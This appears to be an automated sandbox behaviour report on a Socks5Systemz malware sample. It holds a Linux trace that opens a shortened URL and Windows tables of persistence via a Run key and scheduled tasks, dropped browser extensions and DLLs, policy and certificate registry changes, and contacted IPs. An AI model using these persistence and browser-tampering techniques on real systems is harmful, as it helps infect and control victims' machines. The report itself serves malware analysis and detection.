[grep -E -q ^[[:alpha:]+\.\-]+:]
/bin/grep
[grep -E -q ^[[:alpha:]+\.\-]+:]
/bin/sed
[sed -n s/\(^[[:alnum:]+\.-]*\):.*$/\1/p]
/usr/bin/xdg-mime
[xdg-mime query default x-scheme-handler/https]
/usr/bin/dbus-send
[dbus-send --print-reply --dest=org.freedesktop.DBus /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager]
/usr/bin/dbus-launch
[dbus-launch --autolaunch 11c67417355f45d397f6be11f62e85a6 --binary-syntax --close-stderr]
/bin/grep
[grep = \"xfce4\"$]
/usr/bin/xprop
[xprop -root _DT_SAVE_MODE]
/bin/grep
[grep -i ^xfce_desktop_window]
/usr/bin/xprop
[xprop -root]
/bin/grep
[grep -q ^Enlightenment]
/bin/uname
[uname]
/bin/sed
[sed s/:/ /g]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/head
[head -n 1]
/bin/grep
[grep x-scheme-handler/https= /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/head
[head -n 1]
/bin/grep
[grep x-scheme-handler/https= /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/head
[head -n 1]
/bin/grep
[grep x-scheme-handler/https= /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/head
[head -n 1]
/bin/grep
[grep x-scheme-handler/https= /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/head
[head -n 1]
/bin/grep
[grep x-scheme-handler/https= /usr/share//applications/defaults.list /usr/share//applications/mimeinfo.cache]
/bin/sed
[sed s/:/ /g]
/bin/sed
[sed -e s|-|/|]
/bin/sed
[sed -e s|-|/|]
/usr/bin/cut
[cut -d= -f 2-]
/usr/bin/which
[which firefox]
/usr/bin/cut
[cut -d= -f 2-]
/usr/bin/cut
[cut -d= -f 2-]
/usr/bin/cut
[cut -d= -f 2-]
/usr/bin/firefox
[/usr/bin/firefox https://ify.ac/1IZk]
/usr/bin/which
[which /usr/bin/firefox]
/usr/lib/firefox/firefox
[/usr/lib/firefox/firefox https://ify.ac/1IZk]
/bin/grep
[grep -q %s]
/usr/bin/x-www-browser
[x-www-browser https://ify.ac/1IZk]
/usr/bin/which
[which /usr/bin/x-www-browser]
/usr/lib/firefox/firefox
[/usr/lib/firefox/firefox https://ify.ac/1IZk]
/bin/grep
[grep -q %s]
/usr/bin/firefox
[firefox https://ify.ac/1IZk]
/usr/bin/which
[which /usr/bin/firefox]
/usr/lib/firefox/firefox
[/usr/lib/firefox/firefox https://ify.ac/1IZk]
/bin/grep
[grep -q %s]
/bin/grep
[grep -q %s]
/bin/grep
[grep -q %s]
/bin/grep
[grep -q %s]
/bin/grep
[grep -q %s]
/bin/grep
[grep -q %s]
/bin/grep
[grep -q %s]
/bin/grep
[grep -q %s]
/bin/grep
[grep -q %s]
/bin/grep
[grep -q %s]
/bin/grep
[grep -q %s]
/bin/grep
[grep -q %s]
/bin/grep
[grep -q %s]
/bin/grep
[grep -q %s]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 151.101.129.91:443 | tcp | |
| GB | 89.187.167.2:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.62:443 | tcp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-16 05:11
Reported
2024-07-16 05:18
Platform
win11-20240709-en
Max time kernel
450s
Max time network
448s
Command Line
Signatures
Detect Socks5Systemz Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Socks5Systemz
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\RQPXR0N3\2WsCboUrj.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\ZKmFrxgx\UzcFeLB.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\OZhxUQi.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 141.98.234.31 | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000\Software\Microsoft\Windows\CurrentVersion\Run\Snetchball = "C:\\Users\\Admin\\AppData\\Roaming\\Snetchball\\Snetchball.exe" | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Checks installed software on the system
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\OZhxUQi.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\RQPXR0N3\2WsCboUrj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\OZhxUQi.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\RQPXR0N3\2WsCboUrj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\AMqhlrBDqRJU2\wCaWHkT.xml | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\OZhxUQi.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File created | C:\Program Files (x86)\AMqhlrBDqRJU2\trBBEOxWRGajP.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\OZhxUQi.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File created | C:\Program Files (x86)\hMiQKFvmPLjeC\rnhhQTp.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File created | C:\Program Files (x86)\hMiQKFvmPLjeC\jPLBMmW.xml | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File created | C:\Program Files (x86)\OJBbginKvssDnbEKbsR\jiEkRSB.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\OZhxUQi.exe | N/A |
| File created | C:\Program Files (x86)\OJBbginKvssDnbEKbsR\knrdzvi.xml | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\OZhxUQi.exe | N/A |
| File created | C:\Program Files (x86)\OJBbginKvssDnbEKbsR\PzuEZpw.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File created | C:\Program Files (x86)\OJBbginKvssDnbEKbsR\uaMQFLy.xml | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\OZhxUQi.exe | N/A |
| File created | C:\Program Files (x86)\AMqhlrBDqRJU2\USRawYq.xml | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File created | C:\Program Files (x86)\UQtSSXvqU\xlHRzsY.xml | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File created | C:\Program Files (x86)\UQtSSXvqU\HWxvob.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\OZhxUQi.exe | N/A |
| File created | C:\Program Files (x86)\ezMWJXFFLyUn\fMVQVYC.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\OZhxUQi.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File created | C:\Program Files (x86)\AMqhlrBDqRJU2\KHkWxxJvqoebX.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\OZhxUQi.exe | N/A |
| File created | C:\Program Files (x86)\UQtSSXvqU\rBOWGj.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File created | C:\Program Files (x86)\hMiQKFvmPLjeC\bLbuwzk.xml | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\OZhxUQi.exe | N/A |
| File created | C:\Program Files (x86)\UQtSSXvqU\EplivAd.xml | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\OZhxUQi.exe | N/A |
| File created | C:\Program Files (x86)\hMiQKFvmPLjeC\oBDUFQf.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\OZhxUQi.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| File created | C:\Program Files (x86)\ezMWJXFFLyUn\idEnVJv.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\OcPshDNvhDnVmSv.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\bEtnHIcecDUtXwQuWS.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| File created | C:\Windows\Tasks\OcPshDNvhDnVmSv.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\FPIEUdZLMYPzsiUNM.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\MRTHivZIQsRdEanwm.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\Tasks\FPIEUdZLMYPzsiUNM.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\bEtnHIcecDUtXwQuWS.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates physical storage devices
Program crash
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\ZKmFrxgx\UzcFeLB.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\ZKmFrxgx\UzcFeLB.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\RQPXR0N3\2WsCboUrj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\RQPXR0N3\2WsCboUrj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\OZhxUQi.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\OZhxUQi.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
